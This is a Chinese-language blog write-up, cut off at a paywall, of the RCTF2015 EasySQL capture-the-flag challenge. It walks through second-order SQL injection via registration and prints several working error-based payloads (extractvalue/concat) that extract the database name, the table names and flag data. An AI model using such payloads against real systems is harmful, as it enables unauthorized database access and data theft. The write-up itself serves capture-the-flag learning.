这篇博客详细介绍了在RCTF2015中遇到的EasySQL挑战,主要涉及到WordPress平台的SQL注入问题。作者通过分析代码和尝试不同注入方法,成功获取到数据库名、表名以及部分敏感信息,并最终通过正则表达式解密得到了隐藏的flag。博客中还提到了注册过程中的过滤机制和解题过程中使用的脚本。
有修改密码怀疑是2次注入
admin被注册
sqli-lab24关中遇到过二次注入
特地去看了下代码
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
一开始尝试admin’# 修改密码
admin还是登陆不上
使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化
试下报错注入
注册的时候发现有过滤
1"||extractvalue(1,concat(0x7e,(database()),0x7e))#
得到数据库名:web_sqli
1"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)=(database()))),0x7e))#
得到表名article,flag,users
盲猜列名 flag
1"||extractvalue(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e))#
获得"~RCTF{Good job! But flag not her"
疯了,只能试下别的表,希望不要是被我修改了的admin密码
1"||extractvalue(1,concat(0x7e,(select(group_concat(col
最低0.47元/天 解锁文章
扫一扫
928
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
